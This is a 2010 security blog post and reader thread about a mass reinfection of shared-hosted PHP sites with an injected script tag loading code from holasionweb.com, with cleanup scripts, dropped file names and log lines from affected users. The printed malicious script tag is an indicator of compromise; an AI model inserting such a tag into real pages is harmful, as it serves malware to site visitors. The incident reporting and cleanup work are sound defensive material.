Sucuri Blog

Lots of sites reinfected – Now using holasionweb.com

May 12, 2010 | David Dede


Update 2: Reply from GoDaddy: https://blog.sucuri.net/2010/05/reply-from-godaddy-regarding-latest.html

Update: Code used to exploit found: https://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

We just got reports this morning of hundreds of sites getting reinfected at GoDaddy (shared servers). This is the new JavaScript being added to the sites:

< script src =”http://holasionweb.com/oo.php”>< /script>

The changes were all made this morning between 2am and 3am, and every PHP file was modified to include this new code.

All the sites we checked so far were updated (WordPress 2.9.2) and using good permissions. Plus, not all of them were using WordPress. I don't want to see the "users were not updated" excuse again, please. GoDaddy, any ideas as to what is going on?

Note that our previous solution will still clean it up: https://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

The details are all the same as in the previous attack, just using a new host (and new victims):

https://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html
http://sucuri.net/malware/entry/MW:MROBH:1

Notice that this is not related to one specific platform. Most of the sites we checked were using WordPress, but some were on Joomla or using other web applications. Plus, it is very annoying since all the PHP files get modified.

As always, if you are having difficulties getting your site cleaned up, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.


Categories: Website Malware Infections, Website Security
Tags: Hacked Websites

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Noam Rathaus

    May 12, 2010

    Hi,

    You got a broken link there…
    "https://blog.sucuri.net/2010/05/new-attack-today-against-wordpress.html
    http://sucuri.net/malware/entry/MW:MROBH:1"

    Is one "broken" link…

  2. http://sucuri.net

    May 12, 2010

    Noam: Thanks! fixed.

  3. ReadJunk

    May 12, 2010

    Thanks this worked!

    I made a mistake with GoDaddy because I did in file manager a file restore to last week without backing up my latest posts in WordPress. I didn't think it would revert the posts back and it didn't at first, but now the posts are gone since the last time I did a restore when this happened already. I reverted back to yesterday now and the post never showed up. Any ideas what happened??

  4. maximespam@hotmail.fr

    May 12, 2010

    Hello,
    my website (WordPress 2.9.2, hosted on GoDaddy) was infected by this worm too.

    Everybody submits a solution to clean up the website, but nobody submits a FIX, or the origin of the vulnerability!

    We don't know if it's a GoDaddy vulnerability or a WordPress vulnerability.

    Why does nobody try to find the vulnerability origin?

    Sorry for my english.

    M.

  5. Max

    May 12, 2010

    Oops, I've put my email in the wrong input.
    Can you modify my email to name please?

    Thx.

  6. Elizabeth

    May 12, 2010

    I found the JavaScript in my theme's footer.php but don't see it in any other PHP files I've checked. I tried running the script to clean up the site (in case I missed something) but because Bluehost deactivated my sites, I can't get the script to work. How does one run it on a deactivated website?

  7. Anonymous

    May 12, 2010

    Thanks again. My sites seemed to become reinfected. My host, a front for GD have just had another email from me.

    I'm close to moving to another provider.

  8. Anonymous

    May 12, 2010

    We got hacked too.. on shared GoDaddy hosting.. but we didn't have any WordPress on our site in particular. We did have SugarCRM (the only new addition in the last week)..

    your script worked, thanks

  9. Anonymous

    May 12, 2010

    Once again, thank you so much guys. You have been infinitely more helpful than GoDaddy. I am becoming an extremely unhappy customer. PHPBB3 hacked again last night. Your fix worked again this morning.

  10. chris

    May 12, 2010

    For what it's worth, there were two sites that I maintain for a client on GoDaddy that were infected last week. As ridiculous, unlikely and nonsensical as GoDaddy's "explanations" were, they implied the site was infected because there was an old WP installation hanging around that wasn't being used. I thought that particular site (which was for an old blog that my client wasn't using anymore) was in the root directory, therefore a completely different directory tree from the other sites, but actually it was just in a subfolder in the main site's folder. Since I deleted that folder, we haven't gotten reinfected. I don't believe that this could be the case for everyone, but it does seem to lend some amount of credibility to the "outdated WordPress" theory GoDaddy's going with…

  11. Anonymous

    May 12, 2010

    Infected this morning. Absolutely no wordpress or any other prepackaged app in our folders. Only php and html files.

  12. Mathieu

    May 12, 2010

    My site is in php and was also infected….I lost around 300$ in revenue this morning $%#%$#%

    I will change my hosting company at the end of the month….

  13. rvtraveller

    May 12, 2010

    Happened to every PHP file on my shared GoDaddy hosting both this time and last time. On my hosting I have SMF 1.1.11 and phpMyAdmin (most current version) so this corroborates your earlier post with it being a vulnerability in phpMyAdmin. I of course contacted GoDaddy and they gave me the usual garbage about my responsibility to keep scripts up to date and how to notice malware. Completely useless. However, I just restored everything from a backup I had a few days ago and all is well, for now…

  14. rvtraveller

    May 12, 2010

    O, I forgot in my last post to mention that I don't get redirected by the javascript, only my users do. So my speculation is:

    Script is injected through a vulnerability somewhere (possibly phpMyAdmin)

    When a user visits an infected page, the script checks for a leftover phpMyAdmin cookie. If this cookie exists, then the script assumes that this person is an admin for the site and hence doesn't redirect them so they don't suspect anything is wrong.

    If the cookie is not set, this person must be a regular visitor of the site so redirect them.

    Just my speculation.

  15. Anonymous

    May 12, 2010

    Got hacked with 2 hosts – vBulletin and one with custom php files

  16. Anonymous

    May 12, 2010

    This is freaking nuts.

  17. ASchur

    May 12, 2010

    My SMF 2 forum on Godaddy has this as well. This is the second issue in two weeks for my

  18. ReadJunk

    May 12, 2010

    Go Daddy wants 150 bucks from me to use a backup of their database to get a week's worth of postings. Unreal! Does anyone recommend a good hosting company? I might be willing to do dedicated hosting this time, just to not put up with shared hosting anymore.

  19. Maxime

    May 12, 2010

    I've made a temporary solution to quickly clean up the malicious script client-side.

    This script needs jQuery.

    // URL of the injected script
    var MALICIOUS_SRC = 'http://holasionweb.com/oo.php';
    var timer;

    // Strip the src from any matching script tag; returns how many were found
    function removeMaliciousScript() {
        var found = $("body").find("script").filter(function () {
            return $(this).attr('src') === MALICIOUS_SRC;
        });
        found.removeAttr("src");
        return found.length;
    }

    // Execute the script a first time
    removeMaliciousScript();

    function launchTimer() {
        timer = setInterval(loop, 0);
    }
    function clearTimer() {
        clearInterval(timer);
    }
    function loop() {
        // Keep removing while the tag is still present; stop once it is gone
        if (removeMaliciousScript() === 0) {
            clearTimer();
        }
    }

    // And loop it; the loop stops when the src is deleted.
    launchTimer();

  20. Bourgy.com

    May 12, 2010

    I paid the $150 once, now I back up sorta regularly.

    But seriously though GoDaddy are playing with fire here cause many people are surely considering another host.

    Maybe Dreamhost should make us an offer.

    You know what, I think I'll write them.

  21. Josh

    May 12, 2010

    Happened to over 2,000 of my PHP files this morning…. and the Web Fix worked like a charm.

    LIFE SAVER! Thank you so much!

    I do have an old install of WP on my site too… upgrading as I type. F GoDaddy in the A.

  22. Anonymous

    May 12, 2010

    @rvtraveller you are absolutely spot on right with the PMA cookie tracker.
    The script drops a cookie named "pma_visited_theme1", with a value of "1" (in the sites I've seen so far anyways).

    Many of the sites I'm managing (of course on GoDaddy) do run WordPress, but the majority of them don't, so I suspect this is systemic of the shared server environment. A vulnerability thru PMA would make sense, since a compromised PMA in a given cluster would expose those sites stored in the same cluster.

    GoDaddy at this point is rivaling BP, Halliburton, and TransOcean(?) for the top spot in fingerpointing…

    I highly recommend migrating away from GoDaddy, not only b/c of this security problem, but b/c their Customer Service has reached epic f@il levels.

    -C

  23. Bourgy

    May 12, 2010

    Question, how long did the script run for you guys?

    Mine took like 10 seconds and I wonder how it could have cleaned so many php files that quickly

  24. ReadJunk

    May 12, 2010

    @Bourgy.com yeah I have a backup from last week, but didn't think by doing their restore it would overwrite the database changes too, just the actual files. I just installed WordPress DB Backup to have it emailed to me every day. Then it's off to find a new hosting company!

  25. Elizabeth

    May 12, 2010

    After I cleaned up some of my files, bluehost reactivated my site. I ran the fixer script and everything seems to be working fine now. Will continue cleaning out old plugins and themes.

  26. Bourgy

    May 12, 2010

    Did Godaddy take down sites this morning after the attack? Because my traffic is much lower than usual

  27. Big Bear Butt

    May 12, 2010

    My WordPress 2.9.2 site hosted at GoDaddy has been the victim of both of the most recent hacks. The listed fix you developed worked like a charm.

    When GoDaddy was sent a trouble ticket this morning to let them know about our incredible displeasure at their response to date, this is an exact copy of the key part of their response to me.

    GoDaddy's response begins;

    Thank you for contacting Online Support.

    Our Security Operations Center (SOC) is aware of the attacks and has been working with leading WordPress security experts to identify the root cause of the issue. We provide the shared hosting server to you in a clean, uninfected state, and we have security measures in place and anti-virus software installed to ensure the integrity of our hosting accounts. Please note that our SOC found that these attacks have occurred as a result of security vulnerabilities in older versions of WordPress installations on customer hosting accounts. A member of our Security team recently addressed the issue at a teleseminar. You may find more information, including the audio replay of the teleseminar, at the below link:

    http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/

    We recommend you update your WordPress installation to 2.9.2 to eliminate the security vulnerabilities existing in prior WordPress versions. There are several steps to upgrading your WordPress® installation.

    End copy of their email response to me.

    I want to say again, we ARE running the latest WordPress 2.9.2 on our site. Right now. I'm looking at the dashboard.

    GoDaddy's response to me is to blame an old WordPress version, when they are currently hosting the latest one for me right now. They didn't even bother checking what version I am using that got hacked before telling me that it is, in effect, my fault or WordPress's fault, but not theirs.

  28. BC

    May 12, 2010

    @Bourgy – let me ask, What do your stats look like for SE referrers? I ask that b/c if compromised sites all have the same IP Address attached to it, then SEs like Google will take notice of said-exploit attached to the IP Address of these sites and throttle back ranking to limit searcher exposure (not to mention attach a "Malicious Website" notice to the site's SE Listing). At that point it's less GoDaddy taking your site down and hence limiting your traffic and more a negative SEO component. For others hurt similarly and not having been hacked, It's the good ole "One Bad Apple" effect.

  29. Bourgy

    May 12, 2010

    My email to them instructed them not to bother with a nonsensical reply asking me to update WordPress. This is what they sent me:

    Dear Sir or Madam,

    Thank you for contacting Online Support. While there are no ways to ensure that any site is 100% safe from malicious intended attacks. Not only do we constantly strive to combat these attacks, we ask our customers to be vigilante as well to help in this struggle. Other than the remedies offered previously we have no new information or ways to correct these issues. We appreciate your understanding in this matter.

  30. 1WineDude

    May 12, 2010

    I was reinfected today as well, GoDaddy shared hosting. Their support has been useless.

  31. Bourgy

    May 12, 2010

    BC I usually have 2000 SE referees at this time. It's around 800 so far.

    I am not sure about a Google penalty because I actually refreshed my site at the exact moment the attack occurred. Unless the penalty is from a previous attack that's only now taken effect

  32. Anonymous

    May 12, 2010

    My website is hosted at Godaddy but is not a WordPress site, my site is programmed in PHP and is a site of own authorship.

    I applied a solution I found in your site and which has been very useful, in spite of that, as I said before, my site is not done in WordPress (http://sucuri.net/malware/helpers/wordpress -fix_php.txt)

    With the source code that you have used to cure the infection of php files, can use the same approach to infect?

    I ask this because if so it is not surprising that a simple php file, placed in the root folder of an FTP user with privileges higher than many other FTP users, can infect all files under your tree.

    Sorry if my English is a bit poor, but the message was fully translated with Google Translator.

    Thanks for the input of your blog.

  33. Anonymous

    May 12, 2010

    Seriously, I'm sick of GoDaddy's bullshit, all of my WordPress installs were fully upgraded and yet we've still been hacked twice. It's obviously a security issue with their server. I'm switching if possible. (Don't know how to move a large database) 🙁

  34. Kernel Paniker

    May 12, 2010

    I too was hacked. GoDaddy shared hosting. I have hand coded PHP and commercial PHP scripts.

    While your script seems to have removed the malware, Zen Cart, phpMyDirectory and Post Affiliate Pro are a little broken at the moment.

  35. Gregg Blanchard

    May 12, 2010

    Your wordpress-fix.php script removes the code but it also left a single blank line of text at the top of every file giving me "headers already sent" errors all over the place.

    A fix coming soon for that?

  36. Anonymous

    May 12, 2010

    Hacked Again. Had a backup and it took me 20 minutes. Then I ran the script just in case. The script was hidden in the wp-footer. I want out of godaddy but I am scared to not do the transition correctly

  37. Archer

    May 12, 2010

    I have the same problem, wordpress-fix.php script leaves a blank line at the top of every file. Is there a fix?

  38. Kernel Paniker

    May 12, 2010

    That blank line messes up sessions for browsers…

  39. Daniel

    May 12, 2010

    I updated my Gumblar script to remove this malware, too:

    http://www.danielansari.com/wordpress/2010/05/holasionwebcom/

    This uses a regular expression that does NOT leave any blank lines at the top.
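Added example (not Sucuri's wordpress-fix.php, and not the script linked in the comment above): the blank-line problem reported in this thread, reproduced and avoided in Python. It assumes the injection sits on a line of its own at the top of the file as the literal script tag from the post; the signature, function names and sample file are constructed for illustration.

```python
import re

# Constructed signature: the <script> tag shown in the post, with spacing and
# quote style allowed to vary. An encoded or obfuscated injection needs its own.
TAG = (r"<\s*script\b[^>]*\bsrc\s*=\s*[\"']?https?://(?:[\w-]+\.)*holasionweb\.com/"
       r"[^\"'\s>]*[\"']?[^>]*>\s*<\s*/\s*script\s*>")

INLINE = re.compile(TAG, re.IGNORECASE)
# Same signature when it is the only thing on its line: take the indentation
# and the line terminator with it, so no empty line is left behind.
WHOLE_LINE = re.compile(r"^[ \t]*" + TAG + r"[ \t]*(?:\r?\n|\Z)",
                        re.IGNORECASE | re.MULTILINE)


def naive_clean(source):
    """Delete only the matched text (the behaviour that leaves a blank line)."""
    return INLINE.sub("", source)


def clean(source):
    """Remove the injection; return (cleaned_source, number_of_removals)."""
    cleaned, whole = WHOLE_LINE.subn("", source)
    cleaned, inline = INLINE.subn("", cleaned)
    return cleaned, whole + inline


def output_before_php(source):
    """True if anything, even a newline, precedes the opening <?php tag.

    PHP sends those bytes as response body, so a later header() or
    session_start() call fails with "headers already sent".
    """
    return source.find("<?php") > 0


# Constructed sample: injection on its own first line of a PHP file.
INFECTED = (
    '<script src="http://holasionweb.com/oo.php"></script>\n'
    "<?php\n"
    "session_start();\n"
    'echo "hello";\n'
)

if __name__ == "__main__":
    fixed, removed = clean(INFECTED)
    print("removals:", removed)
    print("naive cleanup leaves output before <?php:",
          output_before_php(naive_clean(INFECTED)))
    print("line-aware cleanup leaves output before <?php:",
          output_before_php(fixed))
```
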

  40. Anonymous

    May 12, 2010

    My websites were hacked the second time today (most recent versions, GoDaddy). To prevent visitors from infection in the future I made a cron job to run wordpress-fix.php twice an hour

  41. Anonymous

    May 12, 2010

    my ftp hacked too
    infected more than 30000 php files on my sites
    i got to write php script to clear all my files

    this is russian hacker
    we need to find partner program of this virus
    only then we can stop this shit

  42. Kathy

    May 12, 2010

    I've been hacked 4x in 5 days on two different GoDaddy hosting accounts. I signed up for Sucuri Security and ran a scan. It said I had malware in the cgi-bin/php.ini and that I needed to delete it. But it said that this has been a problem over at Network Solutions, not GoDaddy. I didn't have a cgi-bin folder in my hosting account, so called GoDaddy customer service. She put me on hold for a few minutes and came back saying they ran some scan and yes, there is a big problem there that they'll need to look into. We (as users) don't have access to the cgi-bin folder…only they do – so they were going to "escalate it" and look into how someone got into that folder to plant that php.ini file in there. This would explain why the problem keeps showing up on my GoDaddy account almost every day, even tho I clean it off and why the "quick fix" didn't work for me — it must not be able to get into the cgi-bin folder when it's at GoDaddy??

    If you are on GoDaddy and keep cleaning your site and it keeps coming back: Call GoDaddy and tell them you understand the malware is residing in the cgi-bin folder (which the customer service girl didn't even know existed, by the way) and since you don't have access to it, they need to run their scan and see that this is where the problem is!!

  43. Anonymous

    May 12, 2010

    WPsecuritylock updates: It is going worldwide and spreading to other hosting companies. DAMNG IT!

  44. lisa hazen

    May 12, 2010

    I'm really getting p!ssed that GoDaddy is suggesting that it is just sites that weren't updated. All my sites were running WP 2.9.2, and four were hacked!!!

  45. GoDaddy.com

    May 12, 2010

    We hear your frustration. For full details, see our blog: http://community.godaddy.com/godaddy/whats-up-with-go-daddy-wordpress-php-exploits-and-malware/?isc=smfor1

    If your site's been affected, please fill out the form listed in the article.

    Alicia

  46. Anonymous

    May 12, 2010

    To GoDaddy.com:

    I've filled out your form TWICE and have gotten no response either time. Just an email confirmation that I filled out the form!

    This is ridiculous!

  47. ReadJunk

    May 12, 2010

    I filled out the form twice and NOTHING. I had to call only to get clueless reps on the phone who didn't know a damn thing

  48. Peter

    May 12, 2010

    After 2 weeks of attacks on my GoDaddy hosted WordPress and Drupal sites, I know perfectly well how to CURE the problem.

    But up to now, I have not seen any report on how to PREVENT the problem.

    Any ideas anyone? I am tired of cleaning up my sites…!

  49. Caitlin

    May 12, 2010

    Yeah, GoDaddy's pretty useless. They obviously don't know what's going on, that's why they keep playing the "it's your fault, it's wordpress' fault" game.

    Thanks for the script. Glad someone's trying to help solve this problem. I've been hacked three times in the last month. Cleaned up all my files, up to date on WP, and have complex passwords but I still keep getting hit. GoDaddy's response each time is to send me form responses that don't help me at all.

  50. Bourgy

    May 12, 2010

    When I run the script I don't get that cgi bin message. And the script only runs like 15 seconds.

    Can someone tell me of their experience with the script (length of time it runs, etc, messages) because I'm having doubts the script worked for me

  51. Jean Paul Claude Bumhole

    May 12, 2010

    Peter, I believe the problem is with GoDaddy themselves, and it's a problem they need to fix, everybody should email them and tell them it's THEIR FAULT.

    I don't see how you can prevent a problem as the hierarchy for control is out of our hands.

    I believe that, as all these sites are hosted on shared servers, there is a problem somewhere that is allowing user(s) to control the whole server and not just their allocated space on the server, therefore giving them control of everybody's site(s) instead of just their own.

  52. Anonymous

    May 12, 2010

    GODADDY!!!! STOP PLAYING THE PR GAME and FIX THIS!!!! I'm tired of the run around, the hacks, and the endless clean ups.

  53. Ryan

    May 12, 2010

    My Joomla site (1.5.16) was infected. It is hosted on a shared Linux server through GoDaddy.

    I used the fix and everything seems to work. This happened before (over the weekend) and I simply uploaded a backup of the website which worked temporarily.

    GoDaddy is trying to tell me that I am an isolated incident, but reading the comments here leads me to believe that we're all suffering the same problem and it's not all our fault.

    I'm not entirely sure everything is fixed yet because the Sucuri Web-based Integrity Monitoring system says that I am still infected (though it says the last check was 4 hours ago, so I'll wait until that updates before freaking out).

    Thanks for posting this fix. I'll be back if there are any future attacks.

  54. lisa

    May 12, 2010

    Hey, Go Daddy! You know what I find ironic? When I try to post a comment to your BS blog post about keeping our version of WP up-to-date, I get a 500 error!

  55. Peter

    May 12, 2010

    @Lisa: I notified this to Godaddy. they answered:

    "We're investigating that. If you get an error trying to register for the Community, please refresh the page after it errors out."

    Peter

  56. Peter

    May 12, 2010

    @bourgy: the script runs for about 30 seconds on my sites…

  57. Bourgy

    May 12, 2010

    Thanks Peter, I was worried 30 seconds was too short, but I guess it works quickly.

  58. Kris

    May 12, 2010

    This has been the third time in the last two months all our php files on GoDaddy have been hit with this.

  59. Anonymous

    May 12, 2010

    I'm on Linux shared hosting on GoDaddy and have been attacked 3x now including this last one.

    For those of you who have access to your history, please check to see if there are any unusual files that were "deleted" from your root directory on 5/11. I found one on 5/11 at 9:00pm. I still had access to it even when it was deleted and saw that this was the malware code in PHP. It was named him_vivie.php

    Anyway it was deposited then deleted. So you won't find it if you look at your present directory.

    My FTP logs do not show any intrusion from FTP during that time. So this has got to be a server issue.

  60. Anonymous

    May 12, 2010

    GoDaddy customer here. I've had two sites infected twice each in the last week. I noticed that when I went to update the wordpress authentication keys, they were missing from the wp-config.php file. They're in the backup file but the file on the GoDaddy server had the auth keys missing.

    Is it possible that the hack removes the auth keys and that's why sites are getting re-infected so quickly?

  61. Anonymous

    May 12, 2010

    Can anyone please recommend a good SECURE and solid, and relatively inexpensive alternative hosting company?

    And how hard is it to switch?

    Thanks!!

  62. JohnR

    May 12, 2010

    @rvtraveller and -C,

    If it's a potential vulnerability with phpMyAdmin on GoDaddy, what if anything can we do to protect our sites?

    Not use phpMyAdmin, delete all cookies, anything? Thanks very much.

  63. Anonymous

    May 12, 2010

    Godaddy Customers,

    You can get infected from your own sites. Everyone needs to be doing at least one, and preferably two, antivirus and antispyware scans on their local computers, using two different scanners you don't normally use, to find threats that got past the AV scanner you were using. Some free scanners are at: Trend Micro Housecall, Kaspersky, Malwarebytes, Symantec (Norton), BitDefender, Windows Live OneCare, Computer Associates, McAfee, F-Secure.

    Do it.

  64. go4reward

    May 12, 2010

    GoDaddy refuses to admit its own problem. They blamed me for the virus that infected my site.

  65. Jamie

    May 12, 2010

    What's the difference in price for GoDaddy's dedicated hosting vs. shared hosting? $30 per month instead of $30 per year?

    Seems these viruses would be a great way for GoDaddy to get people to switch to dedicated hosting in order to make more money.

    …..i'm just sayin……

    The sad thing is, they might not lose customers because of this malware issue, but they WILL lose customers because of their "it's not us- it's you" responses/attitude toward it.

  66. Anonymous

    May 12, 2010

    I had the latest copy of wordpress, had an htaccess file to only allow ip access to the wpadmin folder. installed exploit scanner, wp-security admin, and wp firewall. Also changed permissions on the wp-config file to 700. Got hacked anyway.

    I left the site down while moving it to a new host by renaming the wordpress directory to "wordpressxyz" and just using html files with "site under maintenance".

    I'm glad I did – all php pages infected AGAIN – and this while wordpress is not available.

    I can't believe godaddy cannot figure out what is going on.

  67. Jamie

    May 12, 2010

    I should also qualify my statement above by saying that I've read that it's not just GoDaddy hosted sites that are getting infected. Other hosts are having the same issue too, so everyone considering jumping ship would do best to wait, lest they move the whole thing and it happens all over again.

    My (GoDaddy hosted) blog has been hacked twice in the past week, and like many people above, I tried *everything* to fix it. The only thing that worked, ironically comes from GoDaddy themselves, and that's a restore to history in the hosting control panel. I got infected again this morning and I did this, and only this, and it worked like a charm. I only hope it will continue to work for every new time this happens. I better clear my schedule every day to work on this!!

    You can read more about the restore to history process on my blog here, which details it for even tech-dunces like me. 🙂

    http://www.cowbellyblog.com/2010/05/12/the-best-way-to-remove-malware-from-a-wordpress-blog-using-godaddy/

  68. 1WineDude

    May 12, 2010

    Thanks for the idea of scheduling the fix php script via cron – got it running hourly now.

    Interestingly, after my site was impacted I changed my WP, GoDaddy, and FTP passwords. They are not easy to guess and would take a considerable amount of time to hack, so I'm fairly certain at this point that the issue is not simply WP and it's certainly not a password brute force attack…

  69. Anonymous

    May 12, 2010

    Fuck you GoDaddy!
    Second attack in the last 12 days.

    Thank you very much $&%&%%&$(/·"!

  70. Anonymous

    May 13, 2010

    I also see the PHP infection file in my GoDaddy backup from 5/11/2010 with a "Date Modified" of 5/11/2010 9:31:34 pm. The file was named kinsley_hershel.php and was deleted. (I would assume it was deleted after it ran and infected EVERY PHP file again.)

  71. Mart

    May 13, 2010

    As far as I can see my site hasn't been infected (luckily) but it is running so so slowly – is that just a knock-on effect of being on Godaddy shared hosting and maybe other users on my server are infected? It's so frustrating.

  72. Bourgy

    May 13, 2010

    Can we have an instruction on how to run a cron job?

    I see we can do it with GoDaddy but I don't know what to enter, script wise.

  73. Anonymous

    May 13, 2010

    What version of php is this happening with?

    Some of the hosting companies listed above still have older versions of php as the default for many of their customers.

  74. SEO

    May 13, 2010

    Solution with instructions.
    http://www.perustudios.com/psfix.rar

  75. Anonymous

    May 13, 2010

    My drupal hosted on godaddy has been infected too. Twice. I cleaned manually the code and I'm waiting.

  76. Anonymous

    May 13, 2010

    My drupal 5.2 has been hacked. Restored all files, but didn't work. Could this be in the database? I even went into the theme's page.tbl.php and inserted text just below the last body tag… but the exploited malware script still showed between my text and the last body tag. This appears to be an infection of PHP itself and not Drupal. I have 6 WP sites as well and they've all been hacked several times. Even 1 WP site which is not viewable to the web (a playground) and it was hacked. Even php files I wrote myself outside of any WP site and they were hacked. I'm a veteran software engineer and seriously believe this to be a big time flaw with GoDaddy security. Any new news on the Drupal Hack? I've set all my WP directories even for the admin to no 'Write' permissions. So, if they hack my WP sites, they are using some other account than my administrative account. Hmmm Godaddy, what you say about that?

  77. Anonymous

    May 13, 2010

    Thank you, sucuri.net! You've helped us recover very quickly from this crud. It automatically infects IE 8! Terrific. Even older versions of Mozilla are relatively safe.

    In our case I think the initial drop file was called "1ndex.php".

  78. Anonymous

    May 13, 2010

    Also got attacked twice in the last week with PHP pages (no CMS). GoDaddy gave me a canned response saying it's my fault.

  79. Anonymous

    May 13, 2010

    Correction to the above; not "1ndex.php", but rather we were affected by a file "she_elijah.php" that was deleted after 9 PM on 5/11/2010, by GoDaddy File Manager time. We're not WordPress. If anyone figures out how these were dropped, PLEASE post it.

  80. Anonymous

    May 13, 2010

    As a data point, NONE of our passwords were easily guessable or easily brute-forceable.

    And it's not just GoDaddy either… News reports indicate several other SHARED hosting providers, including DreamHost and Network Solutions (who have APOLOGIZED). Database vulnerability?

    http://www.tgdaily.com/security-features/49744-go-daddy-counters-php-hack-attacks

    http://www.scmagazineus.com/widespread-attacks-continue-against-wordpress-sites/article/169956/

  81. Anonymous

    May 13, 2010

    Those long URLs linkified, but may get spamblocked…

    http://www.tgdaily.com/security-features/49744-go-daddy-counters-php-hack-attacks

    http://www.scmagazineus.com/widespread-attacks-continue-against-wordpress-sites/article/169956/

    There are a few more in Google News.

  82. Anonymous

    May 13, 2010

    There is another script cleaning all infections. It is here and everyone says it works like a charm. What do you guys think? It is better to get prepared for the next attack.

    http://www.danielansari.com/wordpress/2010/05/holasionwebcom/

  83. Anonymous

    May 13, 2010

    Guys, I downloaded my logs — here's the IP address of the machine executing the dropped PHP file on my site.

    188.165.200.96

    France. Who'd have thought. Going back to 5/10 I do NOT see any other hit from that IP address OR regarding that file! So the file was not dropped via http ?

    188.165.200.96 - - [12/May/2010:04:xx:xx -0700] "GET http://www.mysite.example.com/she_elijah.php HTTP/1.1" 200 60 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    I hope this helps!
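Added example, not part of the comment above and not Sucuri's tooling: a Python check for the pattern several readers describe, a PHP file in the web root that is requested once by a client that asks for nothing else. The heuristic and function names are assumptions; the sample log is constructed around the line quoted above, with placeholder times and documentation-range addresses for the other clients.

```python
import re
from collections import defaultdict

# Combined log format, the layout of the line quoted in the comment above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
ROOT_PHP = re.compile(r"^/[^/]+\.php$", re.IGNORECASE)  # PHP file directly in the web root
NAME_HINT = re.compile(r"^/[a-z]+_[a-z]+\.php$")        # shape of the names readers reported


def request_path(target):
    """Path of a request target; accepts absolute-form (http://host/x.php) and /x.php."""
    m = re.match(r"^[a-z][a-z0-9+.-]*://[^/]*(/.*)?$", target, re.IGNORECASE)
    path = (m.group(1) or "/") if m else target
    return path.split("?", 1)[0]


def find_one_shot_php(log_text, max_hits=2):
    """Flag root-level PHP files fetched successfully by a single client that
    requested nothing else in the log (constructed heuristic)."""
    by_path = defaultdict(list)
    paths_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in combined format
        entry = m.groupdict()
        entry["path"] = request_path(entry["target"])
        by_path[entry["path"]].append(entry)
        paths_by_ip[entry["ip"]].add(entry["path"])

    findings = []
    for path in sorted(by_path):
        entries = by_path[path]
        ips = {e["ip"] for e in entries}
        if not ROOT_PHP.match(path) or len(ips) != 1 or len(entries) > max_hits:
            continue
        ip = entries[0]["ip"]
        if paths_by_ip[ip] != {path}:
            continue  # the client also browsed other pages: looks like a visitor
        if not any(e["status"] == "200" for e in entries):
            continue  # never served successfully, e.g. a probe for a missing file
        findings.append({
            "path": path,
            "ip": ip,
            "first_seen": entries[0]["ts"],
            # A Googlebot user agent is only a claim; confirming it needs a
            # reverse/forward DNS check, which this offline example does not do.
            "claims_googlebot": "googlebot" in entries[0]["ua"].lower(),
            "name_hint": bool(NAME_HINT.match(path)),
        })
    return findings


# Constructed sample. Only the third line follows the comment; its time of day
# is a placeholder because the comment elides it.
SAMPLE_LOG = """\
192.0.2.10 - - [12/May/2010:03:58:01 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
192.0.2.10 - - [12/May/2010:03:58:02 -0700] "GET /wp-content/themes/default/style.css HTTP/1.1" 200 2048 "http://www.mysite.example.com/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
188.165.200.96 - - [12/May/2010:04:00:00 -0700] "GET http://www.mysite.example.com/she_elijah.php HTTP/1.1" 200 60 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - [12/May/2010:04:05:11 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux i686)"
198.51.100.7 - - [12/May/2010:04:05:40 -0700] "GET /contact.php HTTP/1.1" 200 900 "http://www.mysite.example.com/index.php" "Mozilla/5.0 (X11; Linux i686)"
203.0.113.5 - - [12/May/2010:04:10:00 -0700] "GET /robots.txt HTTP/1.1" 200 30 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.5 - - [12/May/2010:04:10:02 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
"""

if __name__ == "__main__":
    for finding in find_one_shot_php(SAMPLE_LOG):
        print(finding)
```

A hit is a lead to follow up in the file manager history and backups, since the file itself may already have been deleted.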

  84. Anonymous

    May 13, 2010

    Good Solution @SEO
    "http://www.perustudios.com/psfix.rar"
    thanks.

  85. Seth D. Olson

    May 14, 2010

    I have seen a lot of WP cleaners, but nothing for Drupal yet. I have 2 infected Drupal sites which are hosted on GoDaddy. I see the <"http://holasionweb.com/oo.php"> malicious script below my footer in both sites. I've searched in all my .php files and the code is not in those files. I will submit a ticket to GoDaddy, though we'll see what happens. Also, an interesting thought is that I have 2 other sites that are Drupal sites through GoDaddy, and they're not affected yet. Only thing I have actually updated recently is adding Google Adword Image codes (uses their .js and flash images). Doubt there is a connection, but I am looking at every possible angle.

  86. Peter

    May 15, 2010

    @seth

    The WP cleaners work for Drupal also as the infection is identical… My Drupal site got infected the same way as my WP sites got infected.

    You might have to add
    set_time_limit(0);

    at the start of the script, though, as otherwise it might timeout before the cleaning is finished.

    Peter

  87. mansoor

    May 17, 2010

    I can find that there is a script from holasionweb at the end of the source code of my website but I cannot locate it either in footer.php or in the other PHP files I have checked randomly… How can I find where it is located?

  88. Diolt.com

    May 24, 2010

    Hey David Dede!

